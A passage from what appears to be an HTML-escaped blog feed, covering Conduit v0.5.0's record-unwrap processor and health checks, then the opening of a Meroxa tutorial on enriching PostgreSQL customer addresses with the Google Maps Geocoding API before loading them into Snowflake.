            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token string&quot;&gt;&quot;schema&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    Key&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;StructuredData&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;27&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;schema&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;(2)&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    Operation&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;OperationUpdate&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    Metadata&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;opencdc.readAt&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;1674061777225000000&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;opencdc.version&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;v1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;conduit.version&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;v0.4.0&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    Payload&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Change&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        Before&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;StructuredData&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        After&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;StructuredData&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;token string&quot;&gt;&quot;description&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;test1&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;27&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    Key&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;RawData&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        Raw&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;byte&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;27&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Kafka Connect: if the payload is a Kafka Connect record, create a processor named “unwrap” and add the configuration “format:kafka-connect” to it. For example, the record can go from looking like (1) to (2):&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;(1)&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    Payload&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Change&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        Before&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;StructuredData&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        After&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;StructuredData&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;token string&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                &lt;span class=&quot;token string&quot;&gt;&quot;description&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;test2&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
                &lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;27&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token string&quot;&gt;&quot;schema&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    Key&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;StructuredData&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;27&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;schema&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;map&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;(2)&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    Operation&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;OperationSnapshot&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    Payload&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Change&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        After&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;StructuredData&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;token string&quot;&gt;&quot;description&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;test2&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
            &lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;27&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    Key&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;StructuredData&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;27&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Note that &lt;code class=&quot;language-text&quot;&gt;Payload.After&lt;/code&gt; is unwrapped to become the whole record, and the payload from the &lt;code class=&quot;language-text&quot;&gt;Key&lt;/code&gt; is unwrapped too.&lt;/p&gt;
&lt;h2&gt;Implement health check&lt;/h2&gt;
&lt;p&gt;The Conduit Health Check can be used to determine if Conduit is running correctly. It checks whether Conduit can successfully connect to the database with which it was set up (which can be BadgerDB, PostgreSQL, or the in-memory one). Here’s an example:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;curl&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;http://localhost:8080/healthz&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;

&lt;span class=&quot;token output&quot;&gt;{&quot;status&quot;:&quot;SERVING&quot;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;You can also check individual services within Conduit. The following example checks if the PipelineService is running:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;curl&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;http://localhost:8080/healthz?service=PipelineService&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;

&lt;span class=&quot;token output&quot;&gt;{&quot;status&quot;:&quot;SERVING&quot;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;And the rest&lt;/h2&gt;
&lt;p&gt;If you want to see the full list of what was included in this release, check out the &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.5.0&quot;&gt;Conduit Changelog&lt;/a&gt; and the &lt;a href=&quot;https://docs.conduit.io/docs/introduction/getting-started/&quot;&gt;documentation&lt;/a&gt;. Also, feel free to join us on &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt; or &lt;a href=&quot;https://twitter.com/conduitio&quot;&gt;Twitter&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Transformation Part I: Using Meroxa & Google Maps API to enrich & load data into Snowflake in Real-Time]]></title><description><![CDATA[Learn how to use the Meroxa Platform along with the Turbine Framework to transform, enrich, orchestrate, & analyze data in real-time.]]></description><link>https://meroxa.com/blog/transformation-series-part-i</link><guid isPermaLink="false">https://meroxa.com/blog/transformation-series-part-i</guid><dc:creator><![CDATA[Tanveet Gill]]></dc:creator><pubDate>Wed, 22 Feb 2023 16:02:38 GMT</pubDate><content:encoded>&lt;p&gt;&lt;a href=&quot;https://github.com/meroxa/turbine-js-examples/tree/master/postgres-snowflake-google-maps-enrich&quot;&gt;Github Repo&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Welcome to Part I of our Transformation series. In this series, we will show you how to use the Meroxa Platform in conjunction with the Turbine Framework to transform, enrich, orchestrate, and analyze data in real-time.&lt;/p&gt;
&lt;p&gt;Throughout the series, we will use a PostgreSQL database with a table called &quot;customers&quot; that holds information about our customers and the orders they have made. We will apply a number of transformations to enrich this data set in real-time so we can better understand where our customers are from, engage with them, and visualize our data.&lt;/p&gt;
&lt;p&gt;In part I, we will enrich and validate existing customer address data by leveraging the Google Maps API. Street addresses may contain typos, spelling variations, and other errors, and Google Maps is one of the best sources of location-based address data; hence, we chose it as our source of data enhancement and enrichment. Later, we will use this data to plot demographic insights about our customers for business analytics.&lt;/p&gt;
&lt;h2&gt;What is Meroxa?&lt;/h2&gt;
&lt;p&gt;Meroxa is a Stream Processing Application Platform as a Service (SAPaaS) where developers can run Turbine applications. Turbine is Meroxa&apos;s stream processing application framework for building event-driven stream processing apps that respond to data in real-time and scale using cloud-native best practices. Meroxa handles the underlying streaming infrastructure so developers can focus on building the applications. Turbine applications start with an upstream resource. Once that upstream resource is connected, Meroxa takes care of streaming the data into the Turbine application so it can run. Since Meroxa is a developer-first platform, engineers can ingest, orchestrate, transform, and stream data to and from anywhere using languages they already know, such as &lt;strong&gt;&lt;a href=&quot;https://github.com/meroxa/turbine-go&quot;&gt;Go&lt;/a&gt;&lt;/strong&gt;, &lt;strong&gt;&lt;a href=&quot;https://github.com/meroxa/turbine-js&quot;&gt;JavaScript&lt;/a&gt;&lt;/strong&gt;, &lt;strong&gt;&lt;a href=&quot;https://github.com/meroxa/turbine-py&quot;&gt;Python&lt;/a&gt;&lt;/strong&gt;, or &lt;a href=&quot;https://meroxa.com/blog/meroxa-now-streaming-on-ruby&quot;&gt;&lt;strong&gt;Ruby&lt;/strong&gt;&lt;/a&gt;. Support for Java and C# is also on the way.&lt;/p&gt;
&lt;p&gt;💡 Meroxa has support for many source and destination resources. You can see which resources are supported &lt;a href=&quot;https://meroxa.com/integrations/&quot;&gt;here&lt;/a&gt;. If there&apos;s a resource not listed, you can request it by joining our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;. Meroxa is capable of supporting &lt;strong&gt;any&lt;/strong&gt; data resource as a connector.&lt;/p&gt;
&lt;h2&gt;Overview&lt;/h2&gt;
&lt;p&gt;To get started with enriching and collecting metadata on our customers’ addresses, we will leverage the Google Maps Geocoding API. If you are unfamiliar with this API, you can check out the Google Maps documentation &lt;a href=&quot;https://developers.google.com/maps&quot;&gt;here&lt;/a&gt;. We will send customer address information to the API, which returns a more comprehensive object describing the address, including its latitude and longitude.&lt;/p&gt;
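&lt;p&gt;As a quick sketch of what that call looks like (the example address and the &lt;code class=&quot;language-text&quot;&gt;YOUR_API_KEY&lt;/code&gt; placeholder are ours, and the response is abridged to the fields we care about), a Geocoding API request returns the coordinates along with a normalized address:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;curl&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;https://maps.googleapis.com/maps/api/geocode/json?address=1600+Amphitheatre+Parkway+Mountain+View+CA&amp;#x26;key=YOUR_API_KEY&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;

&lt;span class=&quot;token output&quot;&gt;{
  &quot;results&quot;: [
    {
      &quot;formatted_address&quot;: &quot;1600 Amphitheatre Pkwy, Mountain View, CA 94043, USA&quot;,
      &quot;geometry&quot;: { &quot;location&quot;: { &quot;lat&quot;: 37.42, &quot;lng&quot;: -122.08 } }
    }
  ],
  &quot;status&quot;: &quot;OK&quot;
}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;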
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Transformation%20Series%20Part%20I%20-%20Image%201.png&quot; alt=&quot;Transformation Series Part I - Flowchart 1: PostgreSQL to Meroxa (enrich address data) to Snowflake&quot;&gt;&lt;/p&gt;
&lt;p&gt;At a high level, Meroxa will detect changes in your PostgreSQL database via Change Data Capture (CDC). Each record from PostgreSQL will be streamed over to our Turbine application in real-time. In our case, it will take the address and enrich it via the Google Maps API. Once the record has been processed, it will be written to Snowflake.&lt;/p&gt;
&lt;h2&gt;Take Me To The Code!&lt;/h2&gt;
&lt;p&gt;To start, you will need the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.195716328.574921592.1659337186-1213117309.1659337186&quot;&gt;Meroxa account&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup/&quot;&gt;Meroxa supported PostgreSQL DB&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.youtube.com/watch?v=HNavKF7yxe4&quot;&gt;Snowflake Credentials&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://nodejs.org/en/&quot;&gt;Node JS&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Once you have signed up for &lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.195716328.574921592.1659337186-1213117309.1659337186&quot;&gt;Meroxa&lt;/a&gt; and set up the &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;, you can take the following steps to get up and running:&lt;/p&gt;
&lt;p&gt;💡 Here we are creating the resources via the CLI; you can also do so via the &lt;a href=&quot;https://dashboard.meroxa.io/resources&quot;&gt;Meroxa Dashboard&lt;/a&gt; once you are logged in.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Adding your PostgreSQL and Snowflake Resources&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;PostgreSQL&lt;/strong&gt; (&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup/&quot;&gt;Guide on configuring PostgreSQL&lt;/a&gt;) - Source Resource&lt;/p&gt;
&lt;p&gt;Below we are creating a PostgreSQL connection to Meroxa named &lt;code class=&quot;language-text&quot;&gt;pg_db&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Note: To support CDC (Change Data Capture) we turn on the &lt;code class=&quot;language-text&quot;&gt;logical_replication&lt;/code&gt; flag.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create pg_db &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;--type postgres \
--url postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB \
--metadata &apos;{&quot;logical_replication&quot;:&quot;true&quot;}&apos;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Snowflake&lt;/strong&gt; (&lt;a href=&quot;https://www.youtube.com/watch?v=HNavKF7yxe4&quot;&gt;Guide on setting up Snowflake&lt;/a&gt;) - Destination Resource&lt;/p&gt;
&lt;p&gt;Below we are creating a Snowflake connection named &lt;code class=&quot;language-text&quot;&gt;snowflake&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create snowflake &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;--type snowflakedb \
--url &quot;snowflake://$SNOWFLAKE_URL/meroxa_db/stream_data&quot; \
